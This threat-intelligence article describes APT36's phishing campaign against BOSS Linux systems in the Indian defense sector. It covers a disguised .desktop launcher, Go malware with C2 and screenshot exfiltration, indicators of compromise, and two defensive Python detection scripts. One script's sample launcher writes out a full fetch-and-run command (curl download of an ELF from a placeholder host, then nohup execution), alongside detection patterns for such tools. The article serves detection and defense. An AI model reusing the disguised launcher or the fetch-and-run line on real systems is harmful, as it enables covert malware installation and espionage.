APT36’s Sophisticated Cyber-Espionage Campaign Targets BOSS Linux Systems in Indian Defense Sector

APT36, also known as Transparent Tribe, is a Pakistan-based advanced persistent threat (APT) group with a history of targeting Indian government and defense sectors. Since 2013, the group has employed various cyber-espionage tactics, including credential harvesting and malware distribution, primarily focusing on Windows-based systems. However, recent intelligence indicates a significant shift in their operational strategy, with APT36 now targeting Linux-based environments, specifically BOSS Linux systems widely used within Indian government agencies.

Phishing Tactics Exploiting Linux Desktop Files

The latest campaign by APT36 employs a multi-stage infiltration process initiated through meticulously crafted phishing emails. These emails contain ZIP file attachments named Cyber-Security-Advisory.zip, which, when extracted, reveal a malicious .desktop file titled Cyber-Security-Advisory.desktop (MD5 hash: 6eb04445cad300c2878e8fbd3cb60b52). This file is designed to execute silently, evading user detection.

The malicious .desktop file utilizes several key parameters:

– Type=Application: Ensures the system recognizes it as an executable application.

– Terminal=false: Prevents the execution of visible terminal windows, maintaining stealth.

– Icon=libreoffice-impress: Disguises the file as a legitimate presentation, enhancing its deceptive appearance.

Embedded Bash commands within the file change the working directory to /tmp and execute two curl commands. The first downloads slide.pptx from the attacker-controlled domain sorlastore.com. Despite its .pptx extension, this file contains an HTML iframe displaying a decoy blog page, serving as a distraction. The second curl command retrieves the primary payload, a malicious ELF binary named BOSS.elf (MD5: 18cf1e3be0e95be666c11d1dbde4588e), saves it locally as client.elf, and launches it under nohup so that it keeps running in the background after the launcher exits.
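A heuristic triage script for .desktop launchers, added here as an illustration (not code from the campaign or any vendor tool): it parses the [Desktop Entry] section and flags the combination described above, a hidden terminal, an office-suite icon, and an Exec line that works out of /tmp, downloads content and detaches an ELF binary. The sample launchers, the domain example.invalid and the indicator list are constructed for this example.

```python
import re

# Indicators from the lure described above: works out of /tmp, fetches at launch, detaches an ELF.
SUSPICIOUS_EXEC = [
    (r"\bcurl\b|\bwget\b", "downloads content at launch"),
    (r"\bnohup\b|\bsetsid\b", "detaches a background process"),
    (r"\bcd\s+/tmp\b|/tmp/", "works out of /tmp"),
    (r"\.elf\b", "references an ELF payload by name"),
]
OFFICE_ICONS = ("libreoffice", "x-office")

def parse_desktop(text: str) -> dict[str, str]:
    """Return the keys of the [Desktop Entry] section, values verbatim."""
    entry, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_section = line == "[Desktop Entry]"
        elif in_section and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry

def triage(text: str) -> tuple[int, list[str]]:
    """Score a launcher; each matched indicator is one finding."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    findings = [why for pat, why in SUSPICIOUS_EXEC if re.search(pat, exec_line)]
    if findings and entry.get("Terminal", "").lower() == "false":
        findings.append("Terminal=false hides the shell activity")
    icon = entry.get("Icon", "").lower()
    if findings and icon.startswith(OFFICE_ICONS) and "office" not in exec_line:
        findings.append("office-suite icon on a non-office launcher")
    return len(findings), findings

# Constructed samples (placeholder domain, not campaign infrastructure).
LURE = """[Desktop Entry]
Type=Application
Terminal=false
Icon=libreoffice-impress
Exec=bash -c "cd /tmp; curl -sO https://example.invalid/slide.pptx; curl -s https://example.invalid/BOSS.elf -o client.elf; chmod +x client.elf; nohup ./client.elf &"
"""
BENIGN = """[Desktop Entry]
Type=Application
Terminal=false
Icon=libreoffice-impress
Exec=libreoffice --impress %U
"""
```

Run triage() over launchers found in mail attachments, ~/Desktop or ~/.local/share/applications; a non-zero score is a review queue, not a verdict, since legitimate launchers occasionally shell out too.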

Advanced Go-Based Malware Capabilities

The Go-language-based malware exhibits advanced capabilities across multiple attack vectors:

– System Reconnaissance: The malware performs extensive reconnaissance functions, including system hostname identification, CPU and RAM profiling, and runlevel inspection through systemctl commands.

– Activity Logging and Evasion: Utilizing functions like main.junkcalc2, the malware logs activities and employs evasion techniques to avoid detection.

– File System Discovery: Functions such as Main.getDrives and os.readDir enable comprehensive file system discovery and data collection.

– Command and Control (C2) Operations: The malware retrieves server details using main.loadConfig, establishing TCP connections to IP address 101.99.92[.]182:12520. It maintains persistent communication through setKeepAlive and setKeepAlivePeriod functions, automatically attempting reconnection every 30 seconds.

– Data Exfiltration: Employing the github.com/kbinani/screenshot library, the malware captures desktop images. The main.sendResponse function facilitates the exfiltration of various data types, including files, command outputs, and system information.
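The fixed 30-second reconnection interval to a single IP:port is the kind of regularity a network defender can look for. The following beacon-interval check is an added example, not part of the original report or any product: it groups outbound connections by (source, destination, port) from a constructed connection log, and flags flows whose gaps are nearly constant. The log lines, the destination 203.0.113.7 and the jitter threshold are constructed for this example; only the port 12520 and the 30-second cadence come from the report.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed connection log: "timestamp src dst dport". 203.0.113.7 is a
# documentation address standing in for a C2 server, not the real one.
LOG = """\
2024-01-01T10:00:00 10.0.0.5 203.0.113.7 12520
2024-01-01T10:00:30 10.0.0.5 203.0.113.7 12520
2024-01-01T10:01:00 10.0.0.5 203.0.113.7 12520
2024-01-01T10:01:31 10.0.0.5 203.0.113.7 12520
2024-01-01T10:02:00 10.0.0.5 203.0.113.7 12520
2024-01-01T10:00:07 10.0.0.5 198.51.100.9 443
2024-01-01T10:03:41 10.0.0.5 198.51.100.9 443
2024-01-01T10:09:02 10.0.0.5 198.51.100.9 443
2024-01-01T10:11:15 10.0.0.5 198.51.100.9 443
"""

def find_beacons(log: str, min_hits: int = 4, max_jitter: float = 0.1):
    """Return (src, dst, port, mean_gap_seconds) for flows whose inter-connection
    gaps are regular: population std-dev no more than max_jitter * mean gap."""
    times = defaultdict(list)
    for line in log.splitlines():
        ts, src, dst, port = line.split()
        times[(src, dst, int(port))].append(datetime.fromisoformat(ts))
    hits = []
    for key, stamps in times.items():
        if len(stamps) < min_hits:      # too few samples to judge regularity
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        m = mean(gaps)
        if m > 0 and pstdev(gaps) <= max_jitter * m:
            hits.append((*key, round(m, 1)))
    return hits
```

The browsing-like traffic to port 443 has gaps of several minutes with wide variance and is ignored; the 12520 flow reconnects every ~30 seconds with one second of jitter and is reported.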

Alignment with MITRE ATT&CK Framework

The campaign aligns with multiple techniques outlined in the MITRE ATT&CK framework:

– T1566 (Phishing): The use of phishing emails to deliver malicious payloads.

– T1543 (Create or Modify System Process): Establishing persistence through system process manipulation.

– T1059 (Command and Scripting Interpreter): Execution of commands and scripts for malicious purposes.

– T1105 (Ingress Tool Transfer): Transferring tools or payloads into a compromised environment.

– T1071 (Application Layer Protocol): Utilizing application layer protocols for C2 communication.

Implications and Recommendations

The transition of APT36 to targeting Linux-based systems, particularly BOSS Linux, signifies a notable evolution in their cyber-espionage tactics. This shift underscores the increasing risk posed to critical government and defense infrastructure.

Organizations, especially those within the public sector utilizing Linux-based systems, are strongly advised to:

– Enhance Email Security Measures: Implement robust email filtering solutions to detect and block phishing attempts.

– Disable Execution of Untrusted .desktop Files: Configure systems to prevent the execution of untrusted .desktop files to mitigate the risk of malicious payloads.

– Deploy Linux-Specific Detection Tools: Utilize security tools designed to detect and respond to threats targeting Linux environments.

– Conduct Regular Security Training: Educate personnel on recognizing phishing attempts and the importance of not executing unverified files.

– Implement Network Segmentation: Segment networks to limit the spread of malware and restrict unauthorized access.

By adopting these measures, organizations can bolster their defenses against the evolving threats posed by APT36 and similar adversaries.